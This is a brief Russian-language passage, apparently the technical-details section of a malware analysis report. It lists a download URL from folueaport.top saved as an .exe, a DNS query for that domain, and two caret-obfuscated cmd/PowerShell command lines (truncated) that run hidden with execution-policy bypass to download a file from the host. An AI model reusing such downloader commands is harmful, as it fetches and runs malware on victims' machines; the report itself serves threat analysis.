Техническая информация
- http://folueaport.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^Ower^ShelL.ExE -exEC^UTI^o^nPOLiC^y BYp^aSs^ -nopROfIlE -^W^I^N^d^OWS^T^y^l^e hIdDEN (ne^W-^OBj^ECt SyS^t^Em.^Ne^t.^webCl^i^E^Nt)^.^doWNLo^A^df^iLe(^'http://folueapo...
- DNS ASK fo###aport.top
- '<SYSTEM32>\cmd.exe' /c "p^Ower^ShelL.ExE -exEC^UTI^o^nPOLiC^y BYp^aSs^ -nopROfIlE -^W^I^N^d^OWS^T^y^l^e hIdDEN (ne^W-^OBj^ECt SyS^t^Em.^Ne^t.^webCl^i^E^Nt)^.^doWNLo^A^df^iLe(^'http://folueapo...' (со скрытым окном)